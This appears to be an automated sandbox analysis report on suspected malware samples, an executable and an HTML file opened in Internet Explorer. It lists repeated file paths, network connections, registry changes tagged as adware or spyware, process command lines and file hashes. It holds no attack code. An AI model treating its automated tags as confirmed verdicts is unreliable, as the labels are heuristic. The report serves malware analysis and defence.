C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1828-0-0x0000000074C3E000-0x0000000074C3F000-memory.dmp

memory/1828-1-0x0000000000BC0000-0x0000000000D30000-memory.dmp

memory/1828-2-0x0000000005BC0000-0x0000000006164000-memory.dmp

memory/1828-4-0x0000000074C30000-0x00000000753E0000-memory.dmp

memory/1828-5-0x0000000074C3E000-0x0000000074C3F000-memory.dmp

memory/1828-6-0x0000000074C30000-0x00000000753E0000-memory.dmp

memory/1828-7-0x00000000A28F0000-0x00000000A29F5000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

119s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e8e54c690312e54c93365f54cb640aa4000000000200000000001066000000010000200000004e36d0df472f3cc3dcdff2ae61d9246bbe9f8e59c709e62e2cec856786541363000000000e80000000020000200000008f2936b83b40480655840cc24535d2d1337dc4f11d8816d80c9c1fd4996b740f20000000615d8ce4bdf5506d7abb8485c731e2481d26d7a192ce031f3e58257c18c5d86440000000729a837446553543aa03018f2ae498f7bca432d31b6ed087416233e916ca558244ae517828fe1702923c557c4e8acec16b1f74d43fc2d41d13fcf48e0ef809d3 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10ae02a9a888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775427" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e8e54c690312e54c93365f54cb640aa40000000002000000000010660000000100002000000022b0f1da861324deeaa550848d1bb2321dc4261180f1c88314c96a92541e13ae000000000e8000000002000020000000f31c099eea23a61ec0e6b62eefb87fdb4dfb4b1cf1cf6f8678627bbb81333f0790000000a82c0a98cfc3628175a9c0f6861bfdf49c52e9f4e8be50f9e74a6228e76b0f4710a5f8a1cf9a4883fa9a53b4e04d5349c31a49c9e86c0cd817b45da238c4699428f2ff271911c0f909c9758066907ea6b1697646b541821cb4822c72e311affb920d850200e5ceb5fb42e07381a3000f1a9c96ad3c598e883b441482d506b0c837960aaa860f799ac8440185b968f52c40000000ea778903d38d5c41dac7928f9a5424dc800e2a9caae5ed1285cd1d6a3264992d1a099c73149550dc78b4bcbd5d1e63137edeabb7193ede56a2887fe287e495b6 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D480BE11-F49B-11EF-82CE-E62D5E492327} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2340 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabD1E0.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarD2D3.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 644e9196b52ed56028e5866a6e655103
SHA1 41cd787db6a109e06bbb8d387cd0b4ab6e0d20b2
SHA256 fb778708d6202cd025f4570c334ec73c35f4bf0a82393f415361831443b57298
SHA512 a7ea63aa0e7e603be5039fb42737608f48cf3206699dd6535267f36fe8afcba543a802f18126d389d0412775fce3bbcd78368480193c6aede1fd3e3046a65229

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3c1e2d3f1331da59db0101deb5346948
SHA1 9826f2dbfd68e4ee3b7ffa161cc6ad692275413d
SHA256 624092b8c15a61de33eedd43b4141dc5da1d578be9e8d4912ccc8cf46eb1260d
SHA512 64921557082685f60fecc49d961715fc330d27c4f2977006c536885b84a5c72bfb263f19e808398206c49f3fe85b6674eaf979e7b093dfc8cd667d33a93dca2e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e6d148f9d5a2a51fc85023a18e37246c
SHA1 da88f11df55992e0542751b2607d62f8fea9ff0a
SHA256 1529361ccb3f8caedc16e51acf2dd671c5caa4a510ee2795442f2aac0e748f76
SHA512 7a112373a5852a50c6ce803f2655d00b031fc5d0e04bbdaa25da3c6fc63a1b8000be033032102e209c6a8d5e064e3c9627b9ce3bc78202ba3205d6c1f9f0e46d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 156e49e1c8fb9e19a9a6e58bbbd1d82b
SHA1 b9cf573da4db5f03d94e28a1f9978a125c63017b
SHA256 936b669b37ba2f4263c4c8892ae69fcdedeebe91d06dce5050c952d781ddbff4
SHA512 8aa7d01f4c8929b261e9812f8e6b23a4326fc65678cdbd147192a3236c97348164fd647636ea84d09e9cde02aff4ddeda0043b4e6b88fc5aa5986e7ea7e02204

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b706eee24b5067bef5b42b71214ac1ae
SHA1 434dcc56f3288222e0c93c0893070f708a4b243e
SHA256 c0d671f4e63a2bf6938160787ee8716c355bf07c755e67e1c029a2e880c4d502
SHA512 0cdaffc83a716222488c9aea511a38c696f4b342ac528bf43c145ee84a2d9c6bf4df9b9c5ffed2d57596857646d6deacfa3870f2763fe7cc42188e154b236f8e

